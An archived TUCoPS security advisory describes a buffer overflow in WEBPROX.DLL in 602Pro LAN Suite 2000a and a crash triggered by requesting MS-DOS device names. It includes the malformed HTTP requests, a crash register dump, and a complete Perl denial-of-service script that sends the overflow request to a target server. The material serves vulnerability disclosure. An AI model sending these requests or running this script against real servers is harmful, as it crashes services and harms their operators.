Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Windows Net Apps :: 602lsw2.htm

602Pro LAN Suite WEBPROX.DLL Buffer Overflow



Vulnerability

    602Pro Lansuite

Affected

    602Pro Lansuite 2000a 1.0.34 - prior

Description

    'nitr0s' found following.   There are 2  problems, the first  is a
    buffer  overflow  in  WEBPROX.DLL  and  the  other  in relation to
    MS-DOS device  files.Credit should  be given  to Peter  Grundl who
    made nitr0s  think of  trying this  same problem  that he found in
    Alt-N  Technologies  MDaemon  WebConfiguration  feature which also
    affects Xitami Webserver 2.4b5 and probably a whole load of  other
    windows server programs.

    Connect to the webserver and send the following request:

        GET /%2e%2e%2e%2e.... /HTTP/1.0

    Where %2e is over 157 times

    The server depending  on how many  times %2e or  [.] is sent  will
    exit displaying the following error:

        LANSUITE caused an invalid page fault in
        module WEBPROX.DLL at 015f:008a1326.
        Registers:
        EAX=0000000a CS=015f EIP=008a1326
        EFLGS=00010216
        EBX=00000008 SS=0167 ESP=05202848
        EBP=05202848
        ECX=0000000a DS=0167 ESI=81648e38 FS=2c37
        EDX=334f2b1f ES=0167 EDI=81623ff0 GS=0000
        Bytes at CS:EIP:
        8b 48 2c 83 e1 01 85 c9 74 2d 8b 55 08 c7 42 18
        Stack dump:
        052029dc 00862e9a 0000000a 334f2b1f 000000fa
        81623ff0 81648e38 00000008 bff7b317 018d0000
        00000000 018d1650 018d1650 0520ace7 018d164c
        052028cc

    The  other  problem  is  requesting  MS-DOS device files, send the
    following request to the webserver on port 80

        GET /aux

    The code:

    #!/usr/bin/perl
    #
    # 602Pro Lansuite 2000a 1.0.34 Denial Of Service
    #
    #
    # Malformed GET request
    #
    use Getopt::Std;
    use Socket;
    
    getopts('s:', \%args);
    if(!defined($args{s})){&usage;}
    
    my
    ($serv,$port,$foo,$number,$data,$buf,$in_addr,$padd
    r,$proto);
    
    $foo = "%2e";
    $number = "160";
    $data .= $foo x $number;
    $serv = $args{s};
    $port =  80;
    $buf = "GET /$data /HTTP/1.0\r\n\r\n";
    
    $in_addr = (gethostbyname($serv))[4] || die("Error: $!
    \n");
    $paddr = sockaddr_in($port, $in_addr) || die ("Error: $!
    \n");
    $proto = getprotobyname('tcp') || die("Error: $!\n");
    
    socket(S, PF_INET, SOCK_STREAM, $proto) || die
    ("Error: $!");
    connect(S, $paddr) ||die ("Error: $!");
    select(S); $| = 1; select(STDOUT);
    print S "$buf";
    
    print("Data has been successfully sent to $serv\n");
    
    sub usage {die("\n\n$0 -s <server>\n\n");}

Solution

    Not sure what build nitr0s tried, but something similar was  found
    in the past so please take a look at:

        http://oliver.efri.hr/~crv/security/bugs/Others/602lswa.html

    As for second  problem, that one  is OS related.   Filtering could
    help here anyway.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH